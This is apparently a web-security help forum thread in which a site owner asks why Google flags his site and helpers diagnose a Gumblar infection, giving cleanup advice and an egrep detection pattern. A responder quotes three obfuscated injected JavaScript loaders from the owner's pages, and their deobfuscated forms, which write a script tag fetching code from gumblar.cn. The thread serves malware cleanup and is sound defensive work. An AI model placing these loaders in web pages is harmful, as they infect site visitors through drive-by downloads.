While looking for my site on google it gives me
“Site is listed as suspicious – visiting this web site may harm your computer.”
http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.softwebsolutions.com/
Further it says,
Malicious software includes 24 scripting exploit(s).
Malicious software is hosted on 1 domain(s), including gumblar.cn/.
This site was hosted on 1 network(s) including AS26496 (PAH).
I don’t know, how to resolve this issue, Can anybody help me, My domain name : www.softwebsolutions.com
Do you have SSH access to your account?
Log in and type
egrep -ri “tmp_lkojfghx|iframe src|String.fromCharCode|eval\(unescape”
Depending on what you have in your site, many of the results that come back will be entire lines of obfuscated code that have been injected into your site.
The first step, however, is scan your computer.
Get a G O O D antivirus software and scan the bejeezus out of your PC. This infection spreads through FTP passwords, so one of the computer’s you’ve accessed your account through FTP with IS, and I repeat, IS infected and this issue will continue until you clean the computer out and reset that password.
Your page: request_a_quote.aspx has line that right before your <body> tag:
<!-- (function(){var xSRfd='%';var eJGfB=('var>20a>3d>22>53c>72iptE>6egi>6e>65>22>2c>62>3d>22Version()+>22>2cj>3d>22> 22>2cu>3dnavi>67ator>2eu>73>65rAgent>3bi>66(>28u>2ei>6edexO>66(>22W>69n>22) >3e0)>26>26(u>2e>69nde>78Of(>22NT>206>22)>3c0)>26>26(d>6fc>75ment>2ec> 6fo>6bie>2ei>6ede>78>4ff(>22m>69>65k>3d1>22)>3c>30)>26>26>28>74ype>6ff> 28zr>76>7at>73>29>21>3dty>70>65of(>22A>22)>29)>7b>7arv>7ats>3d>22A>22> 3bev>61l(>22if(w>69n>64ow>2e>22>2ba+>22)>6a>3d>6a+>22>2ba+>22>4d>61jor> 22+b>2ba>2b>22Min>6f>72>22>2b>62+a>2b>22Buil>64>22+b+>22j>3b>22)>3bdo> 63umen>74>2ewr>69te>28>22>3cs>63r>69pt>20s>72c>3d>2f>2fgum>62>6car>2e> 63n>2f>72ss>2f>3fid>3d>22>2bj>2b>22>3e>3c>5c>2fscript>3e>22>29>3b>7d') .replace(/>/g,xSRfd);eval(unescape(eJGfB))})(); -->
Script tags have been removed.
Which deobfuscates to:
var a=“ScriptEngine”,b=“Version()+”,j="",u=navigator.userAgent;if((u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”)<0)&&(document.cookie.indexOf(“miek=1”)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=“A”;eval(“if(window.”+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;“);document.write(”
ScriptEngineMinorVersion()<ins>ScriptEngineBuildVersion()</ins>j;
Again, script tags removed for display. Now you can see the gumblar.cn reference.
Your page ebusiness_web_application.html has this:
<!--
(function(){var NEiH='%';eval(unescape(('va~72~20a~3d~22Script~45ngine~22~2cb~3d~22Vers~69on()+~22~
2cj~3d~22~22~2cu~3dnavig~61tor~2euserAge~6e~74~3bif((u~2eindex~4ff(~22Win~
22~29~3e0)~26~26(u~2eindexOf(~22~4e~54~20~36~22~29~3c0)~26~26(doc~75m~
65~6et~2ec~6fo~6b~69e~2eindexOf(~22m~69~65k~3d1~22~29~3c~30)~26~26(ty~
70~65~6f~66(z~72~76~7ats~29~21~3d~74y~70e~6ff(~22A~22))~29~7bz~72v~7at~
73~3d~22~41~22~3beval(~22~69~66(~77i~6e~64ow~2e~22+a+~22)j~3dj+~22+a+~
22Major~22~2bb+a+~22M~69nor~22+b~2ba~2b~22Bui~6cd~22+b+~22~6a~3b~22~
29~3bdoc~75men~74~2ew~72~69~74e(~22~3cs~63ript~20sr~63~3d~2f~2fgum~
62lar~2ec~6e~2f~72ss~2f~3fid~3d~22+~6a+~22~3e~3c~5c~2fsc~72~69pt~3e~22)~
3b~7d').replace(/~/g,NEiH)))})();
-->
Which deobfuscates to:
var a=“ScriptEngine”,b=“Version()+”,j="",u=navigator.userAgent;if((u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”)<0)&&(document.cookie.indexOf(“miek=1”)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=“A”;eval(“if(window.”+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;“);document.write(”
And your page cs-crm-system-dentists.html has this:
<!-- (function(foIi){eval(unescape(('<76a<72<20<61<3d<22ScriptEngine<22<2c<62<3d<22Versi<6fn<28)+<22<2c<6a<3d<22<22<2cu<3dna<76ig<61<74or<2e<75se<72<41ge<6e<74<3bif((<75<2e<69<6edexOf(<22Wi<6e<22)<3e0<29<26<26<28u<2eindexO<66(<22N<54<206<22)<3c0<29<26<26(<64ocument<2ecooki<65<2ein<64ex<4f<66(<22m<69ek<3d1<22)<3c0)<26<26<28typ<65<6ff(z<72vzts)<21<3dtyp<65o<66(<22A<22)))<7bzrvz<74<73<3d<22A<22<3beval(<22<69<66<28wi<6ed<6fw<2e<22+a+<22)j<3dj+<22+a<2b<22Ma<6aor<22<2b<62<2ba+<22Minor<22+b+a<2b<22Buil<64<22+b+<22j<3b<22)<3b<64<6f<63ument<2ew<72i<74e(<22<3c<73cript<20src<3d<2f<2f<67umblar<2ecn<2frss<2f<3fid<3d<22+<6a+<22<3e<3c<5c<2f<73c<72ip<74<3e<22)<3b<7d').replace(foIi,'%')))})(/</g); -->
Which deobfuscates to:
var a=“ScriptEngine”,b=“Version()+”,j="",u=navigator.userAgent;if((u.indexOf(“Win”)>0)&&(u.indexOf(“NT 6”)<0)&&(document.cookie.indexOf(“miek=1”)<0)&&(typeof(zrvzts)!=typeof(“A”))){zrvzts=“A”;eval(“if(window.”+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;“);document.write(”
ScriptEngineMinorVersion()<ins>ScriptEngineBuildVersion()</ins>j;
Those are the only pages we found malscripts on. As you can see each one does basically the same thing, it’s just obfuscated differently.
Change your FTP password and do as tarosic suggested, scan the daylights out of your PC.
I’d go further. Move away from FTP and go to either SFTP or SSH/SCP. We’re doing a video on how to do all this, but it won’t be ready until end of week.
Good luck. (Go Blackhawks!)
Thomas J. Raef
“We Watch Your Website – so you don’t have to!”
http://www.wewatchyourwebsite.com
traef@wewatchyourwebsite.com
Hey Tarosic & WeWatch,
Thank you guys, Thanks a lot. I have identified that malicious scripts working on the site & removed the same. I am waiting for the google to now reconsider.
The worst thing is all google partner site & few social networking site like TWITTER also banned the account due to malicious activity on the site. Its a very strange but thanks to you guys I got the solution of my problem.
Thanks
It appears that Google is no longer flagging your site.
The amount of time it takes for the review to go through and changes to be seen through all data centers can range from a few hours to 24 hours, assuming the site is clean. There have been a lot of sites needing review the past few days, so it is understandable that it took longer than we have seen in the past.
Hi WeWatch,
I have had(?) the same problem (just a different obfuscation) with my 2 websites gis-tec.com and werbetechnik-forum.de (hosted on the same webspace).
I cleaned up every single file manually by deleting the script. Then I deleted the whole webspace and transfered the files from another stand alone PC to that webspace again and – of course – I changed the password before.
Result: gis-tec.com is no more flagged BUT werbetechnik-forum.de still is. Even after several review requests (but Google does not name anymore any suspicious files). I can not find that script or anything similar anymore within the files (even viewed directly from the webspace by ftp).
What could be the reason?
By the way: Can anybody tell me what is the functionality of that script when it is executed (besides copiing itself to other files on the webspace)?
If I understand the script correctly, it will load another script from the gumblar/martuz servers based on whichever browser+version and operating system+version you are accessing the site with.
Essentially allowing a very individual file to be run that would attack the vulnerability of choice to infect your computer.
A simple addition or change to the source site (gumblar/martuz), would instantly change the behavior on all sites infected and target new or 0-day vulnerabilties.
Pretty, but obvious to spot for the trained eye. I guess they’d be trying to hide it better in the future.
Checked the webertechforum and did not see any obvious infection on either the landing page, english or german pages or frames.
One of the reasons that Google may find no malicious contents but still keep you in their suspicious list, is when a page that was infected is suddenly missing. A missing page cannot be validated as free from infection and therefore may cause this “delay” to happen.
Try to see if you can identify the page(s) and recreate these without the infection present so that Google can validate them.
Thanks a lot
I think I found the problem: Up to now I searched all *.htm files for the script between the </head> and <body> tags …
Within a blog that was mentioned here I found the hint that *.js files are affected as well, but at the END! of the file. Now, there is (was) ONE JS on that site and – oups! – I found the script at the end… last surviver (I hope)
OK, now it is fixed and the site should be clean.
Thanks again.
Right. So now we have positively identified that the threat is developing.
So far the threat wasn’t hiding and in plain sight. With the threat now moving to script files it may become a bit more difficult to detect.
Various AV vendors have been capable of detecting threats hidding in script files, but since many script files do not contain the embedded script tags, the files look like normal text to the scan engines. Hence no detection will occur. However, we’ve had some report of Avira and Avast being very agressive at detecting scripts that are in plain text, this might help detect the threat more efficiently when you’ve downloaded the scripts to your local workstation.
Unfortunately when viewing sites like badwarebusters.org, Avira and Avast also often detect the mere mentioning of a partial script as dangerous even without it ever being able to be running on the pages. So I can’t really recommend Avira or Avast while viewing badwarebusters.org as they detects quite a few false positives here. But if you feel confident with these products, I see no reason not to use them anyway, as long as you also know these facts.
